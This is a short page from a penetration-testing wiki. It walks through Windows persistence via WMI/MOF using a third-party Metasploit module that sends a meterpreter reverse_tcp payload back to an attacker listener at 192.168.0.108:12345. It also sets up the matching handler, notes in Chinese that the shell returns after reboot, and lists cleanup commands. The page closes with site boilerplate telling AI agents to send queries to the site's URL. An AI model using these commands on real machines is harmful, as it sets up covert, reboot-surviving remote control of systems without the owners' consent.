# MOF

```
>git clone https://github.com/khr0x40sh/metasploit-modules.git
>mv metasploit-modules/persistence/mof_ps_persist.rb /usr/share/metasploit-framework/modules/post/windows/
>reload_all
>use post/windows/mof_ps_persist
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set session 1
>run
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/453.png)

```
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_tcp
>set lhost 192.168.0.108
>set lport 12345
>set exitonsession false
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/454.png)

```
重启后还会上线
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/455.png)

```
清除后门，进入meterpreter，resource 生成的rc文件
停止MOF
>net stop winmgmt
删除文件夹：C:\WINDOWS\system32\wbem\Repository\
>net start winmgmt 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/quan-xian-wei-chi/windows/mof.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.